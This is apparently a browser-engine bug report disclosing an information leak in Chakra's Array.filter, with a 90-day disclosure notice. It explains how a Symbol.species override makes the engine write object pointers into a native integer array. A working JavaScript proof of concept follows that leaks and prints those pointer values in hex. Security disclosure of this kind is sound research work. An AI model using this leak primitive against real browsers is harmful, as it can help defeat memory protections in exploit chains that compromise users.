There is an info leak in Array.filter. In Chakra, the destination array that arrays are filtered into is initialized using ArraySpeciesCreate, which can create both native and variable arrays. However, the loop that calls the filter function assumes that the destination array is a variable array, and sets each value using DirectSetItemAt, which is unsafe, and can lead to a var pointer being written to an integer array. A PoC is as follows and attached:
var b = new Array(1,2,3);
var d = new Array(1,2,3);
class dummy{
constructor(){
return d;
}
}
class MyArray extends Array {
static get [Symbol.species]() {
return dummy;
}
}
var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);
function test(i){
return true;
}
a.__proto__ = MyArray.prototype;
var o = a.filter(test);
var h = [];
for(item in o){
var n = new Number(o[item]);
if (n < 0){
n = n + 0x100000000;
}
h.push(n.toString(16));
}
alert(h);
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
799 bytes View Download